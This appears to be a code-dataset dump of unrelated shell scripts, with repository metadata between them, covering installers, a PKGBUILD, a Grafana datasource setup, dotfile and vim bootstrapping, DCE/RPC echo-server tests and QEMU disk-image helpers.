*.7z) 7z x $1 ;;
*) echo "'$1' cannot be extracted via ex()" ;;
esac
else
echo "'$1' is not a valid file"
fi
}
alias gr='cd $(git rev-parse --show-toplevel)' # cd to git repo's root directory
# Commit & push
compush()
{
git commit -m "$*"
git push
}
# Commit & Push every changes
compushall()
{
echo "Staging every changes.."
git add .
echo "Preparing commit.."
git commit -a -m "$*"
echo "Pushing to remote.."
git push
}
alias fhi='__fzf_history__' # list history dengan fzf (key: Ctrl+r)
alias vf=fv # Alias kalau salah
# disable Ctrl+s freeze terminal
stty -ixon
[ -f ~/.fzf.zsh ] && source ~/.fzf.zsh
export NVM_DIR="$HOME/.nvm"
[ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh" # This loads nvm
[ -s "$NVM_DIR/bash_completion" ] && \. "$NVM_DIR/bash_completion" # This loads nvm bash_completion
| true
|
defeaa77e42153bf0d7e6ba571d37b5a355d811c
|
Shell
|
JoshMcguigan/estream
|
/install.sh
|
UTF-8
| 1,578
| 4.21875
| 4
|
[
"MIT",
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
#!/usr/bin/env sh
# This is slightly modified version of
# https://github.com/autozimu/LanguageClient-neovim/blob/next/install.sh
# Try install by
# - download binary
# - build with cargo
set -o nounset # error when referencing undefined variable
set -o errexit # exit when command fails
if [ "$#" -ne 1 ]
then
echo "Must pass version to script, like './install.sh v0.1.0'"
exit 1
fi
version=$1
name=estream
try_curl() {
command -v curl > /dev/null && \
curl --fail --location "$1" --output bin/$name
}
try_wget() {
command -v wget > /dev/null && \
wget --output-document=bin/$name "$1"
}
download() {
echo "Downloading bin/${name} ${version}..."
url=https://github.com/JoshMcguigan/estream/releases/download/$version/${1}
if (try_curl "$url" || try_wget "$url"); then
chmod a+x bin/$name
return
else
try_build || echo "Prebuilt binary might not be ready yet. Please check minutes later."
fi
}
try_build() {
if command -v cargo > /dev/null; then
echo "Trying build locally ${version} ..."
cargo install --path=. --force
else
return 1
fi
}
bin=bin/estream
if [ -f "$bin" ]; then
installed_version=$($bin --version)
case "${installed_version}" in
*${version}*) echo "Version is equal to ${version}, skipping install" ; exit 0 ;;
esac
fi
arch=$(uname -sm)
case "${arch}" in
"Linux x86_64") download linux-estream ;;
"Darwin x86_64") download macos-estream ;;
*) echo "No pre-built binary available for ${arch}."; try_build ;;
esac
| true
|
5ebcc0393b42193797a8a3e4a82620e7d05d42bb
|
Shell
|
chakralinux/desktop
|
/qucs/PKGBUILD
|
UTF-8
| 1,569
| 2.828125
| 3
|
[] |
no_license
|
# NOTE adms from github is broken
# remember to check for updates on https://software.opensuse.org/package/adms once in a while
pkgname=qucs
pkgver=0.0.19
pkgrel=1
pkgdesc="An integrated circuit simulator with a graphical user interface"
arch=('x86_64')
url="http://qucs.sourceforge.net"
license=('GPL')
depends=('gcc-libs' 'qt')
makedepends=('git' 'autoconf' 'automake' 'flex' 'bison' 'cmake' 'gperf')
optdepends=('freehdl: to permit digital circuit simulation'
'perl')
provides=('adms')
conflicts=('adms' 'adms-git')
source=("https://github.com/Qucs/qucs/archive/qucs-$pkgver.tar.gz"
"http://download.opensuse.org/repositories/openSUSE:/Leap:/42.2/standard/src/adms-2.3.4-4.3.src.rpm")
sha1sums=('28562fc5877e8c803fefa7be1d1ec578e4e62818'
'c8302d98903254c2d0c91a06830aecd72e1af582')
prepare() {
mkdir -p {build,fake_install}
tar -xf adms-2.3.4.tar.gz
}
build() {
# now adms must be build outsite qucs source tree
cd adms-2.3.4
cmake \
-DCMAKE_INSTALL_PREFIX=/usr \
-DCMAKE_BUILD_TYPE=RELEASE \
-DUSE_MAINTAINER_MODE=0
make DESTDIR="$srcdir/fake_install" install
cd $srcdir/build
cmake ../$pkgname-$pkgname-${pkgver} \
-DCMAKE_INSTALL_PREFIX=/usr \
-DCMAKE_BUILD_TYPE=RELEASE \
-DUSE_MAINTAINER_MODE=0 \
-DADMSXML_DIR=$srcdir/fake_install/usr/bin
make
}
package() {
cd $srcdir/build/$pkgname
make DESTDIR="$pkgdir" install
cd $srcdir/build/$pkgname-core
make DESTDIR="$pkgdir" install
# install adms executables
cd $srcdir/adms-2.3.4
make DESTDIR="$pkgdir" install
}
| true
|
de4913482b8120cf1f1467d1d347252bad3920d9
|
Shell
|
cedric-dufour/custom-conf
|
/generic/all/custom-conf-django-1.11/debian/prerm
|
UTF-8
| 277
| 2.765625
| 3
|
[
"CC-BY-4.0",
"LicenseRef-scancode-public-domain"
] |
permissive
|
#!/bin/bash
[ "${1}" != 'purge' ] && exit 0
PKGNAME='custom-conf-django'
# Uninstall files
custom-conf-uninstall "${PKGNAME}" "/usr/share/${PKGNAME}/config" || exit 1
rm -rf /opt/django-1.11/* /etc/python/django /var/log/python/django /var/cache/python/django
# Exit
exit 0
| true
|
9e5bcf532b6d7d1cb0c2d49b62f520c9c1426fb7
|
Shell
|
jaknu/home
|
/grafana_entrypoint.sh
|
UTF-8
| 340
| 2.6875
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash -e
/run.sh "$@" &
function addsource {
curl admin:admin@localhost:3000/api/datasources \
-H "Content-Type: application/json" \
--data-binary '{"name":"influxdb","type":"influxdb","access":"proxy","url":"http://influx:8086","isDefault":true,"database":"home"}'
}
until addsource; do
echo .
sleep 1
done
wait
| true
|
c173c949261db4d8afa99c7860a121f558ff55a1
|
Shell
|
Guardians-DSC/shell-scripts
|
/packages/cabal-install/install.sh
|
UTF-8
| 1,721
| 3.0625
| 3
|
[] |
no_license
|
#!/bin/bash
#################################################################################################
# #
# Script de instalaçãocabal-install # #
# Autores: Ana Godoy - godoyisadora@gmail.com #
# Abril de 2017 #
# #
#################################################################################################
#Update
apt-get -y update
apt-get -y install gcc g++
apt-get install zlib1g-dev
#Install Cabal
apt-get -y install software-properties-common python-software-properties
yes ' ' |add-apt-repository -y ppa:hvr/ghc
apt-get -y update
apt-get install -y cabal-install-1.22 ghc-7.10.3
cat >> ~/.bashrc <<EOF
export PATH="\$HOME/.cabal/bin:/opt/cabal/1.22/bin:/opt/ghc/7.10.3/bin:\$PATH"
EOF
export PATH=~/.cabal/bin:/opt/cabal/1.22/bin:/opt/ghc/7.10.3/bin:$PATH
wget http://hackage.haskell.org/package/cabal-install-1.24.0.2/cabal-install-1.24.0.2.tar.gz
tar -vzxf cabal-install-1.24.0.2.tar.gz
cd cabal-install-1.24.0.2
./bootstrap.sh
EXTRA_CONFIGURE_OPTS="" ./bootstrap.sh
export PATH=$HOME/.cabal/bin:$PATH
cd ..
rm cabal-install-1.24.0.2.tar.gz
#rm -r cabal-install-1.24.0.2
| true
|
2e2c6c153052e0effee0287c43245d0934d1ba46
|
Shell
|
XiLiXiLiXi/Ansible
|
/Ansible_Linux_Patch/scripts/pre_update.sh
|
UTF-8
| 1,771
| 3.890625
| 4
|
[] |
no_license
|
#!/bin/bash
# @brief actions required to be conducted before updates are applied
# and/or servers are rebooted.
logFile="/tmp/pre_update.log"
###########################
# Begin Functions #
function log_msg {
current_time=$(date "+%Y-%m-%d %H:%M:%S.%3N")
log_level=$1
# all arguments except for the first one, since that is the level
log_msg="${@:2}"
echo "[$current_time] $log_level - $log_msg" >> $logFile
}
function log_error {
log_msg "ERROR" "$@"
}
function log_info {
log_msg "INFO " "$@"
}
function log_debug {
log_msg "DEBUG" "$@"
}
# End Functions #
###########################
###########################
# Begin Body #
#errorCheck=0
#cat /dev/null > $logFile
log_info "========================================================"
log_info "= Pre-update status for $HOSTNAME"
log_info "========================================================"
# Stop app/db
# command to stop app/db
#result=$(ps -ef | grep -i app/db | grep -v grep | wc -l)
#count=0
# if app/db process is still running, PPM has not stopped.
#while [ "$result" != 0 ] && [ $count -lt 9 ]; do
# sleep 20
# result=$(ps -ef | grep -i DNAME | grep -v grep | wc -l)
# count=$((count + 1))
#done
# if app/db hasn't stopped by now, manual intervention/review will be necessary.
#if [ "$result" != 0 ] && [ $count -ge 9 ]; then
# log_error "app/db has NOT stopped"
# errorCheck=1
#else
# log_info "app/db has stopped successfully"
#fi
# Final status of healthchecks
#if [ ${errorCheck} != 0 ]; then
# statusMsg="STATUS: ERROR: Something went wrong. Please review results"
# sed -i "1s/^/$statusMsg\n\n/" $logFile
#else
# statusMsg="STATUS: OK"
# sed -i "1s/^/$statusMsg\n\n/" $logFile
#fi
| true
|
1954599822eb59ad39c84e2a7ead2261784c9ba1
|
Shell
|
shun-fix9/devel-dockerfiles
|
/development-environment-setup
|
UTF-8
| 2,533
| 3.453125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
development_environment_setup_main(){
local root
root=/home/sakai
development_environment_setup_dotfiles
development_environment_setup_plugins
development_environment_setup_vim
development_environment_download_direnv
}
development_environment_setup_dotfiles(){
local dir
local repo
dir=$root
repo=git://github.com/shun-fix9/dotfiles
development_environment_setup_git_sync "."
}
development_environment_setup_plugins(){
local dir
local repo
dir=$root/plugins
mkdir -p $dir
local -a repos=(
git://github.com/shun-fix9/mybashrc
git://github.com/shun-fix9/myprocesses
git://github.com/shun-fix9/findword
git://github.com/sanzen-sekai/mypassword
git://github.com/sanzen-sekai/git-readme
git://github.com/sanzen-sekai/git-pub
git://github.com/sanzen-sekai/git-sub-status
git://github.com/sanzen-sekai/git-post
)
for repo in ${repos[@]}; do
development_environment_setup_git_sync
done
}
development_environment_setup_vim(){
local dir
local repo
local file
dir=$root/.vim/bundle
mkdir -p $dir
local -a repos=(
git://github.com/tpope/vim-pathogen
git://github.com/tpope/vim-fugitive
git://github.com/tpope/vim-endwise
git://github.com/msanders/snipmate.vim
git://github.com/edsono/vim-matchit
git://github.com/plasticboy/vim-markdown
git://github.com/kchmck/vim-coffee-script
git://github.com/cakebaker/scss-syntax.vim
git://github.com/tpope/vim-cucumber
git://github.com/tpope/vim-rails
git://github.com/vim-ruby/vim-ruby
git://github.com/jpo/vim-railscasts-theme.git
)
for repo in ${repos[@]}; do
development_environment_setup_git_sync
done
dir=$root/.vim/autoload
mkdir -p $dir
cd $dir
for file in ../bundle/*/autoload/*; do
if [ -f $file ]; then
if [ ! -L "$(basename $file)" ]; then
ln -s $file
fi
fi
done
}
development_environment_setup_git_sync(){
local name
if [ -n "$1" ]; then
name=$1
else
name=$(basename $repo)
fi
echo "$repo => $dir/$name"
cd $dir
if [ $name = "." ]; then
if [ -d .git ]; then
git pull
else
git clone $repo tmp_git_repo
mv tmp_git_repo/.git .
rm -rf tmp_git_repo
git checkout .
fi
else
if [ -d $name ]; then
cd $name
git pull
else
git clone $repo $name
fi
fi
}
development_environment_download_direnv(){
mkdir -p $root/plugins/direnv/bin
curl -fsSL https://github.com/direnv/direnv/releases/download/v2.8.1/direnv.linux-amd64 > $root/plugins/direnv/bin/direnv
chmod a+x $root/plugins/direnv/bin/direnv
}
development_environment_setup_main
| true
|
4daf644070b57d8687795253ba6ef89bf6b3fe33
|
Shell
|
ksalyer/VBSHWWBabyLooper
|
/scripts/exec_v3.sh
|
UTF-8
| 9,839
| 2.875
| 3
|
[] |
no_license
|
# Help
usage()
{
echo "ERROR - Usage:"
echo
echo " sh $(basename $0) STUDYNAME"
echo
exit
}
if [ -z ${1} ]; then usage; fi
STUDY=${1}
YEARS="2016 2017 2018"
EXECUTABLE=./studies/${STUDY}/doAnalysis
SAMPLES="TTJets_DiLept \
TTJets_SingleLeptFromT \
TTJets_SingleLeptFromTbar \
TTWJetsToLNu \
TTZToLLNuNu_M-10 \
TTZToLL_M-1to10 \
WZTo3LNu \
ZZTo4L \
GluGluHToZZTo4L \
DYJetsToLL_M-50 \
DYJetsToLL_M-10to50 \
WpWpJJ_EWK-QCD \
ttHToNonbb \
ttHTobb \
WJetsToLNu \
tZq_ll_4f_ckm_NLO \
ST_tWll_5f_LO \
TTTT \
TTWH \
TTWW \
TTWZ \
TTZH \
TTZZ \
WWW_4F \
WWZ \
WZG \
WZZ \
ZZZ \
WWToLNuQQ \
ST_s-channel_4f \
ST_t-channel_antitop_4f \
ST_t-channel_top_4f \
ST_tW_antitop_5f \
ST_tW_top_5f \
VBSWmpWmpHToLNuLNu_C2V_6_TuneCP5 \
VBSWmpWmpHToLNuLNu_C2V_3_TuneCP5 \
VBSWmpWmpHToLNuLNu_C2V_4p5_TuneCP5 \
VBSWmpWmpHToLNuLNu_C2V_m2_TuneCP5 \
VBSWmpWmpHToLNuLNu_TuneCP5 \
DoubleEG_Run2016 \
DoubleMuon_Run2016 \
MuonEG_Run2016 \
SingleElectron_Run2016 \
SingleMuon_Run2016 \
DoubleEG_Run2017 \
DoubleMuon_Run2017 \
MuonEG_Run2017 \
SingleElectron_Run2017 \
SingleMuon_Run2017 \
EGamma_Run2018 \
DoubleMuon_Run2018 \
MuonEG_Run2018 \
SingleMuon_Run2018"
# NANOSKIMDIR=/hadoop/cms/store/user/phchang/VBSHWWNanoSkim/v12/
NANOSKIMDIR=/nfs-7/userdata/phchang/VBSHWWNanoSkim_v12/
rm -f .jobs.txt
for SAMPLE in ${SAMPLES}; do
XSEC=""
for YEAR in ${YEARS}; do
HISTDIR=hists/${STUDY}_${YEAR}
mkdir -p ${HISTDIR}
if [[ ${YEAR} == *"2016"* ]]; then NANOTAG=RunIISummer16NanoAOD*; fi
if [[ ${YEAR} == *"2017"* ]]; then NANOTAG=RunIIFall17NanoAOD*; fi
if [[ ${YEAR} == *"2018"* ]]; then NANOTAG=RunIIAutumn18NanoAOD*; fi
if [[ ${SAMPLE} == *"Run201"* ]]; then NANOTAG=""; fi
if [[ ${SAMPLE} == *"tZq_ll_4f_ckm_NLO"* ]]; then XSEC=0.0758; fi
if [[ ${SAMPLE} == *"ST_s-channel_4f"* ]]; then XSEC=3.74; fi
if [[ ${SAMPLE} == *"ST_t-channel_antitop_4f"* ]]; then XSEC=80.95; fi
if [[ ${SAMPLE} == *"ST_t-channel_top_4f"* ]]; then XSEC=136.02; fi
if [[ ${SAMPLE} == *"ST_tW_antitop_5f"* ]]; then XSEC=19.559; fi
if [[ ${SAMPLE} == *"ST_tW_top_5f"* ]]; then XSEC=19.559; fi
if [[ ${SAMPLE} == *"ST_tWll_5f_LO"* ]]; then XSEC=0.01123; fi
if [[ ${SAMPLE} == *"ZZTo4L"* ]]; then XSEC=1.256; fi
if [[ ${SAMPLE} == *"GluGluHToZZTo4L"* ]]; then XSEC=0.0082323; fi
if [[ ${SAMPLE} == *"DYJetsToLL_M-10to50"* ]]; then XSEC=20657.0; fi
if [[ ${SAMPLE} == *"DYJetsToLL_M-50"* ]]; then XSEC=6198.0; fi
if [[ ${SAMPLE} == *"WJetsToLNu"* ]]; then XSEC=61335.0; fi
if [[ ${SAMPLE} == *"ttHTobb"* ]]; then XSEC=0.1279; fi
if [[ ${SAMPLE} == *"TTWJetsToLNu"* ]]; then XSEC=0.2043; fi
if [[ ${SAMPLE} == *"TTZToLLNuNu_M-10"* ]]; then XSEC=0.2529; fi
if [[ ${SAMPLE} == *"TTZToLL_M-1to10"* ]]; then XSEC=0.2529; fi
if [[ ${SAMPLE} == *"TTJets_DiLept"* ]]; then XSEC=91.044; fi
if [[ ${SAMPLE} == *"TTJets_SingleLeptFromT"* ]]; then XSEC=182.96; fi
if [[ ${SAMPLE} == *"TTJets_SingleLeptFromTbar"* ]]; then XSEC=182.96; fi
if [[ ${SAMPLE} == *"WpWpJJ_EWK"* ]]; then XSEC=0.0539; fi
if [[ ${SAMPLE} == *"WZTo3LNu"* ]]; then XSEC=4.4297; fi
if [[ ${SAMPLE} == *"VBSWmpWmpHToLNuLNu_TuneCP5"* ]]; then XSEC=0.00001708; fi
if [[ ${SAMPLE} == *"VBSWmpWmpHToLNuLNu_C2V_6_TuneCP5"* ]]; then XSEC=0.00116*137/59.97; fi
if [[ ${SAMPLE} == *"VBSWmpWmpHToLNuLNu_C2V_3_TuneCP5"* ]]; then XSEC=0.000203237376*137/59.97; fi
if [[ ${SAMPLE} == *"VBSWmpWmpHToLNuLNu_C2V_4p5_TuneCP5"* ]]; then XSEC=0.0005865984*137/59.97; fi
if [[ ${SAMPLE} == *"VBSWmpWmpHToLNuLNu_C2V_m2_TuneCP5"* ]]; then XSEC=0.000418440192*137/59.97; fi
if [[ ${SAMPLE} == *"ttHToNonbb"* ]]; then XSEC=0.215; fi
if [[ ${SAMPLE} == *"TTTT"* ]]; then XSEC=0.009103; fi
if [[ ${SAMPLE} == *"TTWW"* ]]; then XSEC=0.0115; fi
if [[ ${SAMPLE} == *"TTWZ"* ]]; then XSEC=0.003884; fi
if [[ ${SAMPLE} == *"TTZZ"* ]]; then XSEC=0.001982; fi
if [[ ${SAMPLE} == *"TTWH"* ]]; then XSEC=0.001582; fi
if [[ ${SAMPLE} == *"TTZH"* ]]; then XSEC=0.001535; fi
if [[ ${SAMPLE} == *"WWW_4F"* ]]; then XSEC=0.2086; fi
if [[ ${SAMPLE} == *"WWZ"* ]]; then XSEC=0.1651; fi
if [[ ${SAMPLE} == *"WZG"* ]]; then XSEC=0.04123; fi
if [[ ${SAMPLE} == *"WZZ"* ]]; then XSEC=0.05565; fi
if [[ ${SAMPLE} == *"ZZZ"* ]]; then XSEC=0.01398; fi
if [[ ${SAMPLE} == *"WWToLNuQQ"* ]]; then XSEC=49.997; fi
if [[ ${SAMPLE} == *"Run201"* ]]; then XSEC=1; fi # data
if [[ -z "${XSEC}" ]]; then
echo ${SAMPLE} cross section missing!
echo "here is my guess"
grep ${SAMPLE} NanoTools/NanoCORE/datasetinfo/scale1fbs.txt | awk '{print $1, $5}'
exit
fi
if [[ ${SAMPLE} == *"Run201"* ]]; then
if [[ ${SAMPLE} == *"${YEAR}"* ]]; then
:
else
continue
fi
fi
if [[ ${SAMPLE}_${YEAR} == *"VBSWmpWmpHToLNuLNu_TuneCP5_2016"* ]]; then continue; fi
if [[ ${SAMPLE}_${YEAR} == *"VBSWmpWmpHToLNuLNu_TuneCP5_2018"* ]]; then continue; fi
if [[ ${SAMPLE}_${YEAR} == *"VBSWmpWmpHToLNuLNu_C2V_6_TuneCP5_2016"* ]]; then continue; fi
if [[ ${SAMPLE}_${YEAR} == *"VBSWmpWmpHToLNuLNu_C2V_6_TuneCP5_2017"* ]]; then continue; fi
if [[ ${SAMPLE}_${YEAR} == *"VBSWmpWmpHToLNuLNu_C2V_3_TuneCP5_2016"* ]]; then continue; fi
if [[ ${SAMPLE}_${YEAR} == *"VBSWmpWmpHToLNuLNu_C2V_3_TuneCP5_2017"* ]]; then continue; fi
if [[ ${SAMPLE}_${YEAR} == *"VBSWmpWmpHToLNuLNu_C2V_4p5_TuneCP5_2016"* ]]; then continue; fi
if [[ ${SAMPLE}_${YEAR} == *"VBSWmpWmpHToLNuLNu_C2V_4p5_TuneCP5_2017"* ]]; then continue; fi
if [[ ${SAMPLE}_${YEAR} == *"VBSWmpWmpHToLNuLNu_C2V_m2_TuneCP5_2016"* ]]; then continue; fi
if [[ ${SAMPLE}_${YEAR} == *"VBSWmpWmpHToLNuLNu_C2V_m2_TuneCP5_2017"* ]]; then continue; fi
EXTRATAG=""
if [[ ${SAMPLE} == *"VBSWmpWmpHToLNuLNu_C2V_4p5_TuneCP5"* ]]; then EXTRATAG=ext1; fi
# Last bit modification
if [[ ${SAMPLE} == *"Run201"* ]]; then
XSEC=1;
SAMPLEWITHUNDERSCORE=${SAMPLE} # Data does not get the underscore
else
# If it is not data then the SAMPLE string gets a "_" subscript in order to loop over them
SAMPLEWITHUNDERSCORE=${SAMPLE}_
fi
NEVENTSINFOFILE=${NANOSKIMDIR}/${SAMPLEWITHUNDERSCORE}*${NANOTAG}*${EXTRATAG}*/merged/nevents.txt
if [[ ${SAMPLE} == *"Run201"* ]]; then
NTOTALEVENTS=1
NEFFEVENTS=1
SCALE1FB=1
else
NTOTALEVENTS=$(head -n1 ${NEVENTSINFOFILE})
NEFFEVENTS=$(tail -n1 ${NEVENTSINFOFILE})
SCALE1FB=$(echo "${XSEC} / ${NEFFEVENTS} * 1000" | bc -l)
fi
echo ""
echo "=========================================================================================="
echo "Preparing command lines to process ..."
echo "Sample :" ${SAMPLE}
echo "Year :" ${YEAR}
echo "Nano tag :" ${NANOTAG}
echo "N events information file :" ${NEVENTSINFOFILE}
echo "N total events :" ${NTOTALEVENTS}
echo "N eff total events (i.e. pos-neg) :" ${NEFFEVENTS}
echo "Cross section (pb) :" ${XSEC}
echo "Scale1fb :" ${SCALE1FB}
echo ""
#
# More than 1 jobs
#
NJOBS=1
if [[ ${SAMPLE}_${YEAR} == *"ttHToNonbb_2016"* ]]; then NJOBS=2; fi
if [[ ${SAMPLE}_${YEAR} == *"ttHToNonbb_2017"* ]]; then NJOBS=2; fi
if [[ ${SAMPLE}_${YEAR} == *"ttHToNonbb_2018"* ]]; then NJOBS=2; fi
if [[ ${SAMPLE}_${YEAR} == *"TTWJetsToLNu_2016"* ]]; then NJOBS=6; fi
if [[ ${SAMPLE}_${YEAR} == *"TTWJetsToLNu_2017"* ]]; then NJOBS=6; fi
if [[ ${SAMPLE}_${YEAR} == *"TTWJetsToLNu_2018"* ]]; then NJOBS=6; fi
if [[ ${SAMPLE}_${YEAR} == *"WZTo3LNu_2016"* ]]; then NJOBS=1; fi
if [[ ${SAMPLE}_${YEAR} == *"WZTo3LNu_2017"* ]]; then NJOBS=6; fi
if [[ ${SAMPLE}_${YEAR} == *"WZTo3LNu_2018"* ]]; then NJOBS=6; fi
if [[ ${SAMPLE}_${YEAR} == *"tZq_ll_4f_ckm_NLO_2016"* ]]; then NJOBS=7; fi
if [[ ${SAMPLE}_${YEAR} == *"tZq_ll_4f_ckm_NLO_2017"* ]]; then NJOBS=7; fi
if [[ ${SAMPLE}_${YEAR} == *"tZq_ll_4f_ckm_NLO_2018"* ]]; then NJOBS=7; fi
if [[ ${SAMPLE}_${YEAR} == *"TTZToLLNuNu_M-10_2016"* ]]; then NJOBS=7; fi
if [[ ${SAMPLE}_${YEAR} == *"TTZToLLNuNu_M-10_2017"* ]]; then NJOBS=5; fi
if [[ ${SAMPLE}_${YEAR} == *"TTZToLLNuNu_M-10_2018"* ]]; then NJOBS=7; fi
if [[ ${SAMPLE}_${YEAR} == *"TTTT_2017"* ]]; then NJOBS=2; fi
if [[ ${SAMPLE}_${YEAR} == *"TTTT_2018"* ]]; then NJOBS=7; fi
if [[ ${SAMPLE}_${YEAR} == *"ZZTo4L_2016"* ]]; then NJOBS=2; fi
if [[ ${SAMPLE}_${YEAR} == *"ZZTo4L_2017"* ]]; then NJOBS=20; fi
if [[ ${SAMPLE}_${YEAR} == *"ZZTo4L_2018"* ]]; then NJOBS=20; fi
NJOBSMAXIDX=$((NJOBS - 1))
FILELIST=$(ls ${NANOSKIMDIR}/${SAMPLEWITHUNDERSCORE}*${NANOTAG}*${EXTRATAG}*/merged/output.root | tr '\n' ',')
FILENAME=output
for IJOB in $(seq 0 ${NJOBSMAXIDX}); do
echo "rm -f ${HISTDIR}/${SAMPLE}_${FILENAME}_${IJOB}.root; ${EXECUTABLE} -t Events -o ${HISTDIR}/${SAMPLE}_${FILENAME}_${IJOB}.root --scale1fb ${SCALE1FB} -j ${NJOBS} -I ${IJOB} -i ${FILELIST} > ${HISTDIR}/${SAMPLE}_${FILENAME}_${IJOB}.log 2>&1" >> .jobs.txt
done
done
done
echo "Launching jobs in parallel...."
xargs.sh .jobs.txt
echo "Done!"
| true
|
a7b1792f93f0722f9840fc0ded34a3b639568e35
|
Shell
|
kenferrara/pbis-open
|
/dcerpc/demos/echo_server/echo-tests.sh
|
UTF-8
| 1,634
| 3.453125
| 3
|
[
"Apache-2.0",
"HP-1986",
"OLDAP-2.8",
"BSD-4-Clause-UC",
"BSD-2-Clause"
] |
permissive
|
#!/bin/bash
# Exercise the dcerpc echo server across every combination of:
#   transport       tcp / named pipe        (protocols)
#   authentication  negotiate / krb5 / ntlm (auth_methods)
#   header signing  off / on                (signing_types)
#   protection      integrity / privacy     (top-level driver)
# Each inner function is driven by globals set by its caller; the call
# chain is: driver -> signing_types -> auth_methods -> protocols.
#
# Usage: echo-tests.sh <host> <service-principal> <user> <password>
# A valid Kerberos ticket (kinit) is required before running.

if ! /opt/pbis/bin/klist >/dev/null; then
    echo "You must use first kinit get credentials in the correct domain."
    exit 1
fi

host=$1
if [ -z "$host" ]; then
    echo "Specify the host to test against as the first argument"
    exit 1
fi

princ=$2
if [ -z "$princ" ]; then
    echo "Specify the service principal to use as the second argument"
    exit 1
fi

# User/password are only used by the NTLM leg (see auth_methods).
user=$3
password=$4

generate_size=100   # -g: payload size per echo call
calls=100           # -c: number of echo calls per run

# Run one tcp and one named-pipe test using the current global settings
# ($auth*, $signing*, $protection*). The option variables are expanded
# unquoted on purpose: each may hold several command-line words.
# Exits with status 2 on the first failing run.
protocols()
{
    echo "$auth over tcp $protection protection$signing"
    echo /opt/pbis/tools/echo_client -h "$host" -a "$princ" -t -c$calls -g$generate_size $auth_options $signing_options $protection_options
    /opt/pbis/tools/echo_client -h "$host" -a "$princ" -t -c$calls -g$generate_size $auth_options $signing_options $protection_options || exit 2
    echo "$auth over named pipe $protection protection$signing"
    echo /opt/pbis/tools/echo_client -h "$host" -a "$princ" -n -e '\pipe\echo' -c$calls -g$generate_size $auth_options $signing_options $protection_options
    /opt/pbis/tools/echo_client -h "$host" -a "$princ" -n -e '\pipe\echo' -c$calls -g$generate_size $auth_options $signing_options $protection_options || exit 2
}

# Run `protocols` once per authentication mechanism.
auth_methods()
{
    auth="Negotiate authentication"
    auth_options="-S negotiate"
    protocols
    auth="Kerberos authentication"
    auth_options="-S krb5"
    protocols
    auth="Ntlm authentication"
    auth_options="-S ntlm -U $user -P $password"
    protocols
}

# Run `auth_methods` once without and once with header signing (-s).
signing_types()
{
    signing=""
    signing_options=""
    auth_methods
    signing=" with header signing"
    signing_options="-s"
    auth_methods
}

# Top-level driver: repeat everything at both protection levels.
protection="integrity"
protection_options="-p5"
signing_types
protection="privacy"
protection_options="-p6"
signing_types
| true
|
032abbe41f6dcd4de6ea161396e407fb387d673c
|
Shell
|
navidkhoshavi/marss.stt-ram
|
/vmutils.sh
|
UTF-8
| 9,277
| 3.96875
| 4
|
[] |
no_license
|
#!/bin/bash
# Source this file (it won't do anything if you just run it) and then use the
# commands: vmsetup, vmclone, vmmount, vmumount, vmchroot
#
# This file contains a set of commands that make it easier to deal with marss disk images
# I tried to briefly describe what the functions do, but if you need help
# you can send an email to dramninjas (at) gmail (dot) com and I can try
# to explain how to use these.
#
# The gist is that I have 3 raw disk images hda.raw (/root in the VM), hdb.raw (some
# benchmarks like SPEC06 mounted at /root/mnt in the VM), and hdc.raw (containing
# some autorun script at /root/sim/simulate.sh which will be auto run when the
# VM starts). These disk images are copied and the appropriate simulate.sh file is
# loaded into each one when vmsetup is called. vmrun then launches the virtual machine
# and the simulation within the VM begins automatically, allowing one to start up many
# instances at once -- only limited by processors and memory.
#
# The root image needs a bit of work to make this happen (such as autologin as
# root with mingetty) and modifications to /root/.bashrc, but the vmchroot
# command makes it easy to add these without having to actually run the image in QEMU
#adjust these paths to taste
QEMU_IMG_BIN="$HOME/marss.dramsim/qemu/qemu-img"   # qemu-img binary used by vmclone
IMAGE_DIR="$HOME/disks"                            # where the pristine raw disk images live
MOUNT_POINT="$IMAGE_DIR/mnt"                       # loop-mount target used by vmmount/vmchroot
# referred to from here on out as the "base image"
IMAGE_NAME="parsec.base.raw"
IMAGE_PATH="$IMAGE_DIR/$IMAGE_NAME"
MARSS_DIR=$HOME/marss.dramsim                      # simulator tree; per-VM files are created here
######################## The actual "public" functions ######################
function vmmount () {
    # Mount image $1 at $MOUNT_POINT and drop into a root shell there;
    # `sudo su` blocks until that shell exits, after which the image is
    # unmounted and the old working directory restored.
    __mount_image $1
    __vmpushd $MOUNT_POINT
    #TODO: this doesn't always have to be done as root for things like the hdc image ...
    sudo su
    vmumount
    __vmpopd
}
#for symmetry's sake
function vmumount() {
    # Thin alias so mount/umount commands come in a matching public pair.
    __umount_image
}
# vmclone -- Takes a raw disk image and creates a qcow2 copy of it
# run 'vmclone output.qcow2' to make a copy of the "base image"
# or run 'vmclone someimage.raw output.qcow2' if you want to make a clone of some other image
# vmclone -- create a qcow2 copy of a raw disk image.
#   vmclone out.qcow2           clone the configured base image ($IMAGE_PATH)
#   vmclone in.raw out.qcow2    clone an arbitrary image (searched literally,
#                               then under $IMAGE_DIR)
function vmclone() {
    #TODO: maybe use getopt to add a -force flag to override the output file check
    if [ "$#" == "2" ] ; then
        # try both the filename and to prefix the IMAGE_DIR directory to see if the file exists
        if [ -e "$1" ] ; then
            local INPUT_FILENAME="$1"
        elif [ -e "$IMAGE_DIR/$1" ] ; then
            local INPUT_FILENAME="$IMAGE_DIR/$1"
        else
            echo "Input image $1 not found"
            return
        fi
        if [ -e "$2" ] ; then
            echo "Output file $2 already exists"
            return
        fi
        local OUTPUT_FILENAME="$2"
    elif [ "$#" == "1" ] ; then
        if [ -e "$1" ] ; then
            # BUGFIX: this message used "$2", which is always empty in the
            # one-argument form; the pre-existing output file is "$1".
            echo "Output file $1 already exists"
            return
        fi
        local INPUT_FILENAME="$IMAGE_PATH"
        local OUTPUT_FILENAME="$1"
    else
        # BUGFIX: the optional input file comes FIRST (see the 2-arg branch);
        # the old usage string listed the arguments in the reverse order.
        echo "usage: $0 [input_filename] output_filename -- Must at least specify output file ";
        return
    fi
    echo "cloning $INPUT_FILENAME to $OUTPUT_FILENAME..."
    $QEMU_IMG_BIN convert -f raw "$INPUT_FILENAME" -O qcow2 "$OUTPUT_FILENAME"
}
# vmrun x -- launch VM #x with the proper parameters for that number
# use 'vmsetup x' before using the vmrun command. Note: the VM will launch
# in a detached screen. Please read up on how to use screen if you are
# not familiar with it, or just remove the call to screen to run as a foreground
# task
